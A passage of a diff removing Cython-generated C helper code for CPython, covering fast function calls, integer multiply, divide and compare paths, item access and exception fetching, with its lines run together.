done; - } - } - if (kwargs != NULL) { - Py_ssize_t pos, i; - kwtuple = PyTuple_New(2 * nk); - if (kwtuple == NULL) { - result = NULL; - goto done; - } - k = &PyTuple_GET_ITEM(kwtuple, 0); - pos = i = 0; - while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { - Py_INCREF(k[i]); - Py_INCREF(k[i+1]); - i += 2; - } - nk = i / 2; - } - else { - kwtuple = NULL; - k = NULL; - } - closure = PyFunction_GET_CLOSURE(func); -#if PY_MAJOR_VERSION >= 3 - kwdefs = PyFunction_GET_KW_DEFAULTS(func); -#endif - if (argdefs != NULL) { - d = &PyTuple_GET_ITEM(argdefs, 0); - nd = Py_SIZE(argdefs); - } - else { - d = NULL; - nd = 0; - } -#if PY_MAJOR_VERSION >= 3 - result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, - args, (int)nargs, - k, (int)nk, - d, (int)nd, kwdefs, closure); -#else - result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, - args, (int)nargs, - k, (int)nk, - d, (int)nd, closure); -#endif - Py_XDECREF(kwtuple); -done: - Py_LeaveRecursiveCall(); - return result; -} -#endif - -/* PyObjectCallMethO */ -#if CYTHON_COMPILING_IN_CPYTHON -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { - PyObject *self, *result; - PyCFunction cfunc; - cfunc = __Pyx_CyOrPyCFunction_GET_FUNCTION(func); - self = __Pyx_CyOrPyCFunction_GET_SELF(func); - if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) - return NULL; - result = cfunc(self, arg); - Py_LeaveRecursiveCall(); - if (unlikely(!result) && unlikely(!PyErr_Occurred())) { - PyErr_SetString( - PyExc_SystemError, - "NULL result without error in PyObject_Call"); - } - return result; -} -#endif - -/* PyObjectFastCall */ -#if PY_VERSION_HEX < 0x03090000 || CYTHON_COMPILING_IN_LIMITED_API -static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { - PyObject *argstuple; - PyObject *result = 0; - size_t i; - argstuple = PyTuple_New((Py_ssize_t)nargs); - if (unlikely(!argstuple)) return NULL; - for (i = 0; i < nargs; i++) { - Py_INCREF(args[i]); - if (__Pyx_PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]) < 0) goto bad; - } - result = __Pyx_PyObject_Call(func, argstuple, kwargs); - bad: - Py_DECREF(argstuple); - return result; -} -#endif -static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { - Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); -#if CYTHON_COMPILING_IN_CPYTHON - if (nargs == 0 && kwargs == NULL) { - if (__Pyx_CyOrPyCFunction_Check(func) && likely( __Pyx_CyOrPyCFunction_GET_FLAGS(func) & METH_NOARGS)) - return __Pyx_PyObject_CallMethO(func, NULL); - } - else if (nargs == 1 && kwargs == NULL) { - if (__Pyx_CyOrPyCFunction_Check(func) && likely( __Pyx_CyOrPyCFunction_GET_FLAGS(func) & METH_O)) - return __Pyx_PyObject_CallMethO(func, args[0]); - } -#endif - #if PY_VERSION_HEX < 0x030800B1 - #if CYTHON_FAST_PYCCALL - if (PyCFunction_Check(func)) { - if (kwargs) { - return _PyCFunction_FastCallDict(func, args, nargs, kwargs); - } else { - return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); - } - } - #if PY_VERSION_HEX >= 0x030700A1 - if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { - return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); - } - #endif - #endif - #if CYTHON_FAST_PYCALL - if (PyFunction_Check(func)) { - return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); - } - #endif - #endif - if (kwargs == NULL) { - #if CYTHON_VECTORCALL - #if Py_VERSION_HEX < 0x03090000 - vectorcallfunc f = _PyVectorcall_Function(func); - #else - vectorcallfunc f = PyVectorcall_Function(func); - #endif - if (f) { - return f(func, args, (size_t)nargs, NULL); - } - #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL - if (__Pyx_CyFunction_CheckExact(func)) { - __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); - if (f) return f(func, args, (size_t)nargs, NULL); - } - #endif - } - if (nargs == 0) { - return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); - } - #if PY_VERSION_HEX >= 0x03090000 && !CYTHON_COMPILING_IN_LIMITED_API - return PyObject_VectorcallDict(func, args, (size_t)nargs, kwargs); - #else - return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); - #endif -} - -/* PyIntBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_MultiplyCObj(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check) { - CYTHON_MAYBE_UNUSED_VAR(intval); - CYTHON_MAYBE_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op2))) { - const long a = intval; - long b = PyInt_AS_LONG(op2); - -#ifdef HAVE_LONG_LONG - if (sizeof(PY_LONG_LONG) > sizeof(long)) { - PY_LONG_LONG result = (PY_LONG_LONG)a * (PY_LONG_LONG)b; - return (result >= LONG_MIN && result <= LONG_MAX) ? - PyInt_FromLong((long)result) : PyLong_FromLongLong(result); - } -#endif -#if CYTHON_USE_TYPE_SLOTS - return PyInt_Type.tp_as_number->nb_multiply(op1, op2); -#else - return PyNumber_Multiply(op1, op2); -#endif - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op2))) { - const long a = intval; - long b, x; -#ifdef HAVE_LONG_LONG - const PY_LONG_LONG lla = intval; - PY_LONG_LONG llb, llx; -#endif - if (unlikely(__Pyx_PyLong_IsZero(op2))) { - return __Pyx_NewRef(op2); - } - if (likely(__Pyx_PyLong_IsCompact(op2))) { - b = __Pyx_PyLong_CompactValue(op2); - } else { - const digit* digits = __Pyx_PyLong_Digits(op2); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op2); - switch (size) { - case -2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT+30) { - b = -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT+30) { - llb = -(PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT+30) { - b = (long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT+30) { - llb = (PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT+30) { - b = -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT+30) { - llb = -(PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT+30) { - b = (long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT+30) { - llb = (PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT+30) { - b = -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT+30) { - llb = -(PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT+30) { - b = (long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT+30) { - llb = (PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - default: return PyLong_Type.tp_as_number->nb_multiply(op1, op2); - } - } - CYTHON_UNUSED_VAR(a); - CYTHON_UNUSED_VAR(b); - #ifdef HAVE_LONG_LONG - llb = b; - goto long_long; - #else - return PyLong_Type.tp_as_number->nb_multiply(op1, op2); - #endif - return PyLong_FromLong(x); -#ifdef HAVE_LONG_LONG - long_long: - llx = lla * llb; - return PyLong_FromLongLong(llx); -#endif - - - } - #endif - if (PyFloat_CheckExact(op2)) { - const long a = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double b = __pyx_PyFloat_AsDouble(op2); -#else - double b = PyFloat_AS_DOUBLE(op2); -#endif - double result; - - PyFPE_START_PROTECT("multiply", return NULL) - result = ((double)a) * (double)b; - PyFPE_END_PROTECT(result) - return PyFloat_FromDouble(result); - } - return (inplace ? PyNumber_InPlaceMultiply : PyNumber_Multiply)(op1, op2); -} -#endif - -/* RaiseTooManyValuesToUnpack */ -static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected) { - PyErr_Format(PyExc_ValueError, - "too many values to unpack (expected %" CYTHON_FORMAT_SSIZE_T "d)", expected); -} - -/* RaiseNeedMoreValuesToUnpack */ -static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index) { - PyErr_Format(PyExc_ValueError, - "need more than %" CYTHON_FORMAT_SSIZE_T "d value%.1s to unpack", - index, (index == 1) ? "" : "s"); -} - -/* IterFinish */ -static CYTHON_INLINE int __Pyx_IterFinish(void) { - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - PyObject* exc_type = __Pyx_PyErr_CurrentExceptionType(); - if (unlikely(exc_type)) { - if (unlikely(!__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) - return -1; - __Pyx_PyErr_Clear(); - return 0; - } - return 0; -} - -/* UnpackItemEndCheck */ -static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected) { - if (unlikely(retval)) { - Py_DECREF(retval); - __Pyx_RaiseTooManyValuesError(expected); - return -1; - } - return __Pyx_IterFinish(); -} - -/* PyIntBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_TrueDivideObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check) { - CYTHON_MAYBE_UNUSED_VAR(intval); - CYTHON_MAYBE_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - const long b = intval; - long a = PyInt_AS_LONG(op1); - - if (8 * sizeof(long) <= 53 || likely(labs(a) <= ((PY_LONG_LONG)1 << 53))) { - return PyFloat_FromDouble((double)a / (double)b); - } - return PyInt_Type.tp_as_number->nb_true_divide(op1, op2); - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op1))) { - const long b = intval; - long a, x; - if (unlikely(__Pyx_PyLong_IsZero(op1))) { - } - if (likely(__Pyx_PyLong_IsCompact(op1))) { - a = __Pyx_PyLong_CompactValue(op1); - } else { - const digit* digits = __Pyx_PyLong_Digits(op1); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op1); - switch (size) { - case -2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT && 1 * PyLong_SHIFT < 53) { - a = -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - case 2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT && 1 * PyLong_SHIFT < 53) { - a = (long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - case -3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT && 2 * PyLong_SHIFT < 53) { - a = -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - case 3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT && 2 * PyLong_SHIFT < 53) { - a = (long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - case -4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT && 3 * PyLong_SHIFT < 53) { - a = -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - case 4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT && 3 * PyLong_SHIFT < 53) { - a = (long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - default: return PyLong_Type.tp_as_number->nb_true_divide(op1, op2); - } - } - if ((8 * sizeof(long) <= 53 || likely(labs(a) <= ((PY_LONG_LONG)1 << 53))) - || __Pyx_PyLong_DigitCount(op1) <= 52 / PyLong_SHIFT) { - return PyFloat_FromDouble((double)a / (double)b); - } - return PyLong_Type.tp_as_number->nb_true_divide(op1, op2); - return PyLong_FromLong(x); - - } - #endif - if (PyFloat_CheckExact(op1)) { - const long b = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double a = __pyx_PyFloat_AsDouble(op1); -#else - double a = PyFloat_AS_DOUBLE(op1); -#endif - double result; - - PyFPE_START_PROTECT("divide", return NULL) - result = ((double)a) / (double)b; - PyFPE_END_PROTECT(result) - return PyFloat_FromDouble(result); - } - return (inplace ? PyNumber_InPlaceTrueDivide : PyNumber_TrueDivide)(op1, op2); -} -#endif - -/* PyIntCompare */ -static CYTHON_INLINE int __Pyx_PyInt_BoolNeObjC(PyObject *op1, PyObject *op2, long intval, long inplace) { - CYTHON_MAYBE_UNUSED_VAR(intval); - CYTHON_UNUSED_VAR(inplace); - if (op1 == op2) { - return 0; - } - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - const long b = intval; - long a = PyInt_AS_LONG(op1); - return (a != b); - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op1))) { - int unequal; - unsigned long uintval; - Py_ssize_t size = __Pyx_PyLong_DigitCount(op1); - const digit* digits = __Pyx_PyLong_Digits(op1); - if (intval == 0) { - return (__Pyx_PyLong_IsZero(op1) != 1); - } else if (intval < 0) { - if (__Pyx_PyLong_IsNonNeg(op1)) - return 1; - intval = -intval; - } else { - if (__Pyx_PyLong_IsNeg(op1)) - return 1; - } - uintval = (unsigned long) intval; -#if PyLong_SHIFT * 4 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 4)) { - unequal = (size != 5) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[3] != ((uintval >> (3 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[4] != ((uintval >> (4 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 3 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 3)) { - unequal = (size != 4) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[3] != ((uintval >> (3 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 2 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 2)) { - unequal = (size != 3) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 1 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 1)) { - unequal = (size != 2) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif - unequal = (size != 1) || (((unsigned long) digits[0]) != (uintval & (unsigned long) PyLong_MASK)); - return (unequal != 0); - } - #endif - if (PyFloat_CheckExact(op1)) { - const long b = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double a = __pyx_PyFloat_AsDouble(op1); -#else - double a = PyFloat_AS_DOUBLE(op1); -#endif - return ((double)a != (double)b); - } - return __Pyx_PyObject_IsTrueAndDecref( - PyObject_RichCompare(op1, op2, Py_NE)); -} - -/* GetItemInt */ -static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j) { - PyObject *r; - if (unlikely(!j)) return NULL; - r = PyObject_GetItem(o, j); - Py_DECREF(j); - return r; -} -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, - CYTHON_NCP_UNUSED int wraparound, - CYTHON_NCP_UNUSED int boundscheck) { -#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - Py_ssize_t wrapped_i = i; - if (wraparound & unlikely(i < 0)) { - wrapped_i += PyList_GET_SIZE(o); - } - if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyList_GET_SIZE(o)))) { - PyObject *r = PyList_GET_ITEM(o, wrapped_i); - Py_INCREF(r); - return r; - } - return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); -#else - return PySequence_GetItem(o, i); -#endif -} -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, - CYTHON_NCP_UNUSED int wraparound, - CYTHON_NCP_UNUSED int boundscheck) { -#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - Py_ssize_t wrapped_i = i; - if (wraparound & unlikely(i < 0)) { - wrapped_i += PyTuple_GET_SIZE(o); - } - if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyTuple_GET_SIZE(o)))) { - PyObject *r = PyTuple_GET_ITEM(o, wrapped_i); - Py_INCREF(r); - return r; - } - return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); -#else - return PySequence_GetItem(o, i); -#endif -} -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, int is_list, - CYTHON_NCP_UNUSED int wraparound, - CYTHON_NCP_UNUSED int boundscheck) { -#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS - if (is_list || PyList_CheckExact(o)) { - Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyList_GET_SIZE(o); - if ((!boundscheck) || (likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o))))) { - PyObject *r = PyList_GET_ITEM(o, n); - Py_INCREF(r); - return r; - } - } - else if (PyTuple_CheckExact(o)) { - Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyTuple_GET_SIZE(o); - if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyTuple_GET_SIZE(o)))) { - PyObject *r = PyTuple_GET_ITEM(o, n); - Py_INCREF(r); - return r; - } - } else { - PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; - PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; - if (mm && mm->mp_subscript) { - PyObject *r, *key = PyInt_FromSsize_t(i); - if (unlikely(!key)) return NULL; - r = mm->mp_subscript(o, key); - Py_DECREF(key); - return r; - } - if (likely(sm && sm->sq_item)) { - if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { - Py_ssize_t l = sm->sq_length(o); - if (likely(l >= 0)) { - i += l; - } else { - if (!PyErr_ExceptionMatches(PyExc_OverflowError)) - return NULL; - PyErr_Clear(); - } - } - return sm->sq_item(o, i); - } - } -#else - if (is_list || PySequence_Check(o)) { - return PySequence_GetItem(o, i); - } -#endif - return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); -} - -/* PyObjectCallOneArg */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg) { - PyObject *args[2] = {NULL, arg}; - return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); -} - -/* ObjectGetItem */ -#if CYTHON_USE_TYPE_SLOTS -static PyObject *__Pyx_PyObject_GetIndex(PyObject *obj, PyObject *index) { - PyObject *runerr = NULL; - Py_ssize_t key_value; - key_value = __Pyx_PyIndex_AsSsize_t(index); - if (likely(key_value != -1 || !(runerr = PyErr_Occurred()))) { - return __Pyx_GetItemInt_Fast(obj, key_value, 0, 1, 1); - } - if (PyErr_GivenExceptionMatches(runerr, PyExc_OverflowError)) { - __Pyx_TypeName index_type_name = __Pyx_PyType_GetName(Py_TYPE(index)); - PyErr_Clear(); - PyErr_Format(PyExc_IndexError, - "cannot fit '" __Pyx_FMT_TYPENAME "' into an index-sized integer", index_type_name); - __Pyx_DECREF_TypeName(index_type_name); - } - return NULL; -} -static PyObject *__Pyx_PyObject_GetItem_Slow(PyObject *obj, PyObject *key) { - __Pyx_TypeName obj_type_name; - if (likely(PyType_Check(obj))) { - PyObject *meth = __Pyx_PyObject_GetAttrStrNoError(obj, __pyx_n_s_class_getitem); - if (meth) { - PyObject *result = __Pyx_PyObject_CallOneArg(meth, key); - Py_DECREF(meth); - return result; - } - } - obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); - PyErr_Format(PyExc_TypeError, - "'" __Pyx_FMT_TYPENAME "' object is not subscriptable", obj_type_name); - __Pyx_DECREF_TypeName(obj_type_name); - return NULL; -} -static PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key) { - PyTypeObject *tp = Py_TYPE(obj); - PyMappingMethods *mm = tp->tp_as_mapping; - PySequenceMethods *sm = tp->tp_as_sequence; - if (likely(mm && mm->mp_subscript)) { - return mm->mp_subscript(obj, key); - } - if (likely(sm && sm->sq_item)) { - return __Pyx_PyObject_GetIndex(obj, key); - } - return __Pyx_PyObject_GetItem_Slow(obj, key); -} -#endif - -/* PyIntCompare */ -static CYTHON_INLINE int __Pyx_PyInt_BoolEqObjC(PyObject *op1, PyObject *op2, long intval, long inplace) { - CYTHON_MAYBE_UNUSED_VAR(intval); - CYTHON_UNUSED_VAR(inplace); - if (op1 == op2) { - return 1; - } - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - const long b = intval; - long a = PyInt_AS_LONG(op1); - return (a == b); - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op1))) { - int unequal; - unsigned long uintval; - Py_ssize_t size = __Pyx_PyLong_DigitCount(op1); - const digit* digits = __Pyx_PyLong_Digits(op1); - if (intval == 0) { - return (__Pyx_PyLong_IsZero(op1) == 1); - } else if (intval < 0) { - if (__Pyx_PyLong_IsNonNeg(op1)) - return 0; - intval = -intval; - } else { - if (__Pyx_PyLong_IsNeg(op1)) - return 0; - } - uintval = (unsigned long) intval; -#if PyLong_SHIFT * 4 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 4)) { - unequal = (size != 5) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[3] != ((uintval >> (3 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[4] != ((uintval >> (4 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 3 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 3)) { - unequal = (size != 4) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[3] != ((uintval >> (3 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 2 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 2)) { - unequal = (size != 3) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 1 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 1)) { - unequal = (size != 2) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif - unequal = (size != 1) || (((unsigned long) digits[0]) != (uintval & (unsigned long) PyLong_MASK)); - return (unequal == 0); - } - #endif - if (PyFloat_CheckExact(op1)) { - const long b = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double a = __pyx_PyFloat_AsDouble(op1); -#else - double a = PyFloat_AS_DOUBLE(op1); -#endif - return ((double)a == (double)b); - } - return __Pyx_PyObject_IsTrueAndDecref( - PyObject_RichCompare(op1, op2, Py_EQ)); -} - -/* RaiseUnboundLocalError */ -static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname) { - PyErr_Format(PyExc_UnboundLocalError, "local variable '%s' referenced before assignment", varname); -} - -/* GetException */ -#if CYTHON_FAST_THREAD_STATE -static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) -#else -static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb) -#endif -{ - PyObject *local_type = NULL, *local_value, *local_tb = NULL; -#if CYTHON_FAST_THREAD_STATE - PyObject *tmp_type, *tmp_value, *tmp_tb; - #if PY_VERSION_HEX >= 0x030C00A6 - local_value = tstate->current_exception; - tstate->current_exception = 0; - if (likely(local_value)) { - local_type = (PyObject*) Py_TYPE(local_value); - Py_INCREF(local_type); - local_tb = PyException_GetTraceback(local_value); - } - #else - local_type = tstate->curexc_type; - local_value = tstate->curexc_value; - local_tb = tstate->curexc_traceback; - tstate->curexc_type = 0; - tstate->curexc_value = 0; - tstate->curexc_traceback = 0; - #endif -#else - PyErr_Fetch(&local_type, &local_value, &local_tb); -#endif - PyErr_NormalizeException(&local_type, &local_value, &local_tb); -#if CYTHON_FAST_THREAD_STATE && PY_VERSION_HEX >= 0x030C00A6 - if (unlikely(tstate->current_exception)) -#elif CYTHON_FAST_THREAD_STATE - if (unlikely(tstate->curexc_type)) -#else - if (unlikely(PyErr_Occurred())) -#endif - goto bad; - #if PY_MAJOR_VERSION >= 3 - if (local_tb) { - if (unlikely(PyException_SetTraceback(local_value, local_tb) < 0)) - goto bad; - } - #endif - Py_XINCREF(local_tb); - 